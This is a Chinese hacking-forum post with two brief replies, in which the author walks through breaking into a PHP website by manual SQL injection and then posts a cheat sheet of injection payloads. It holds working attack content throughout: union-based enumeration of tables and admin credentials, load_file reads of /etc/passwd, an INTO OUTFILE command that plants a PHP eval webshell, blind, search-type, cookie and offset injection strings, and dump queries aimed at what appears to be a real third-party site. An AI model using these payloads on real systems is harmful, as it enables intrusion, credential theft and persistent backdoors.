找回密码
 立即注册
查看: 3252|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
2 Z1 e( H& Y* L$ b让我看看,既然人家开口了,我也不好拒绝,那就看看吧?; p( j: z' Q' p3 Z  J
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
  y1 o, `  Q0 T1 |7 {1 U/ ~如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)2 z4 @) c+ `; @, ?7 n  G
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
$ l4 K& D! b  b- q- p) W/ e这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:, n  c5 g' j4 @- u/ M  A( k
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
& P/ c3 V. P  S5 u7 a/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入. V& Z( O5 A6 `) v7 r
                        
9 f* G; q. `) E" ]0 O2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
, G, J/ E: H8 B  o2 @* b9 W/ Q3 a3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
; J- ~) E7 j: S8 _2 A- n+ I5 [4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
# Q; T5 |! j2 H/ _5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。9 V) n# m! ?  {6 w$ x% k; N0 Z( C; z/ [
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,) I8 L( n* E+ `7 S! I, x9 y
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。# Y  ^/ ~) k$ y9 s
我就用的是第二个思路,
8 n$ L: g' ~# @; M' B% ~0 I: {+ c2 T提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  , z* R9 z- M, w: S$ w
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
9 e- r, u( z1 C, X! ]1 o提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--# K+ K' ^+ }$ }; ]
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。1 G" Q0 S  S4 B7 A
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
& ^, a4 T( L- A9 Q8 c! F8 L是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
& F8 p! |0 ]. L提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --9 E. E/ j' U8 K+ D) R
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,$ n3 ^  k  \9 O8 Y* J: ?
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......( P  k, S9 \7 j) B. b3 B
下面是一些很普遍注入方式资料:* n: h2 m6 i+ O6 Z3 ]2 e
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
4 G3 L. A: K9 p+ X8 t8 z9 p8 I* ]6 v拆半法
  A1 P( f5 T3 M5 d+ U! A. K######################################
* ?# h7 j1 d& W; w1 k! _* Oand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。2 r/ Y( L( b( W- ^
and exists (select * from admin)' h2 `- A7 E0 f& W9 k/ A  L
and exists(select id from admin)' O% X% u, |! @8 s3 \7 `$ i
and exists(select id from admin where id=1)0 l* y8 B* `0 E, Y
and exists(select id from admin where id>1)
3 f6 v7 q' \3 h+ V& @然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
- q0 v$ x3 v; Oand exists (select username from admin)8 H; T3 Q" l8 n) |. L& D" Q
and exists (select password from admin)
4 t- @% \$ C% J3 [1 hand exists (select id from admin where len(username)<10 and id=1)0 h! ^$ I, X  b+ s& m# U9 V' M$ ]
and exists (select id from admin where len(username)>5 and id=1)
9 B3 b; g" l6 j8 K) J; o: Pand exists (select id from admin where len(username)=6 and id=1)" o' T* ^$ g  P5 r, h; w
and exists (select id from admin where len(password)<10 and id=1)
" c& \8 @  h3 E" O0 S8 C  i. Z4 tand exists (select id from admin where len(password)>5 and id=1)
3 v1 k8 _$ b* `; Y( y; wand exists (select id from admin where len(password)=7 and id=1)
$ t& u# {5 O' G# F! zand (select top 1 asc(mid(username,1,1)) from admin)=97/ a% F8 e7 i4 m+ `! X
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
5 u1 |$ K3 s3 w/ L5 O6 s3 f& [猜第二位把username,1,1改成username,2,1就可以了。
4 D/ d& A( l1 J2 m3 K猜密码把username改成password就OK了
+ B* [- q& |1 f$ c##################################################
) J; S; ^. W8 C( I" z2 `搜索型注入# |2 e  H0 y1 z! b% B
##################################
# q& S9 h- M' B& M3 D& a, V# T" u%' and 1=1 and '%'='; `5 B! m2 x7 A7 f4 J
%' and exists (select * from admin) and '%'='
6 `, n: K7 t" [8 y4 d3 ^; @%' and exists(select id from admin where id=1) and '%'='9 q6 n+ B5 t" R' l
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
, A( @, e5 g/ i  [/ F2 [* w- U%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
* ~9 P6 N! C5 W%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
) ]& u1 j, O; n这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'=': m4 H% n! u# _: t: Q
对于MSSQL数据库,后面可以吧 and '%'='换成--
( ?/ n1 x: x2 |5 {3 Q还有一点搜索型注入也可以使用union语句。
) C& d0 Z# ?* l& Y8 m########################################################% i% M' [: P' s8 o" \% e
联合查询。
: G! q  _, U* u9 T3 q#####################################
$ t/ U/ G% _* R$ a6 e% korder by 10
* y2 \1 A! `$ Jand 1=2 union select 1,2,3,4,5,6,7,8,9,10
. d# _4 ~! t& g3 }" C& \" o  Z& J* rand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin% O/ K7 S# }! h' X
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1: `1 a. \% C: T2 {; R; E: }! e; c
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)" c& Z4 |2 n( l( i* }
###################################4 Q8 e7 q/ x* V  x/ N) \: q
cookie注入6 F5 y% n+ s, B
################################ _' p1 d$ G; u5 U0 H: F* v# W- w
http://www.******.com/shownews.asp?id=1276 V- Y$ h% o+ `6 s
http://www.******.com/shownews.asp& B4 |. b1 |6 I
alert(="id="+escape("127"));9 p5 S8 w! a0 s* D" s0 r* q; T1 Q
alert(="id="+escape("127 and 1=1"));
" w& \  }3 H2 s( r6 ]alert(="id="+escape("127 order by 10"));
6 _0 ]3 g/ Y, b( X( jalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));/ ^1 `! \5 M9 H
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));3 f' [3 _& N- J6 c
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
/ P: b- n6 Y, }3 M###################################
. F  b  z7 u7 N: T偏移注入' j" D5 @( Q7 j
###########################################################& Z% ^% J% o$ h2 `  U3 O' y% h
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
( q+ {! O8 S, A7 `4 Uunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin- F: m: Z. ]5 T
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
) r, a! G' e: f9 k% J  tunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)/ m4 U" \- @9 L" s  I
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)2 B: O' b0 Y  D% w
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)1 `$ A3 d0 b/ V- a
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on+ K0 }5 S/ h" p% i* E
a.id=d.id)
1 [. c1 I4 T- {- X) Rand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
4 S1 \0 s6 A% E1 M# ]. qand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 0 I4 ?( C2 Z1 U$ c$ b! r5 H
  / W5 Y/ V2 A! U4 N! @
============================================================================================================
' u8 Q* K9 e! L8 g1 x0 ]( ?  e1.判断版本9 D+ z4 `( A' u; s
and ord(mid(version(),1,1))>51
6 ], o9 A  w  R+ _: \返回正常,说明大于4.0版本,支持ounion查询
" H& w/ w+ C7 ^- G/ Z1 ]# p% |2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
& E  G. _" `3 rand 2=4 union select 1,2,3,4,5,6,7,8,9--
1 u7 Y7 k. s3 @3.查看数据库版本及当前用户,
( H: V- Q3 w- B1 R0 z; l' _; Band 2=4 union select 1,user(),version(),4,5,6,7,8,9--
5 a; j3 d( R% W5 S1 m  O+ m数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,- [* g4 z% B& |+ w1 k9 J/ v
4.判断有没有写权限- n' c5 U: u9 @2 J% l" W) e- I. B" h
and (select count(*) from MySQL.user)>0-- . C# x2 `$ v$ q! M8 ?+ z0 p
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,12 \' `; t) \0 |6 m
用不了这个命令,就学习土耳其黑客手法,如下
1 g6 I* g1 G/ ^& v3 G  `0 Land+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--3 L9 C; \6 b2 R. z
6.爆表,爆库
  `. C- s) [2 e7 k# L" }and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
4 V# C0 f/ a$ V" |7.爆列名,爆表
/ ^' x& m  Z0 s! N8 l* @. Fand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
' w) ?9 A# m7 Y  c- a8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
" P2 Z) ?2 M* K1 ~3 n. Z/ Tand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--  C. \" B, f  A1 w0 p" P  ~
9.爆字段内容
+ a8 P5 F! Z! I. Y: J7 K' I  Aand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--1 U/ v; A. ^& f4 Q" j4 j  C2 [
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表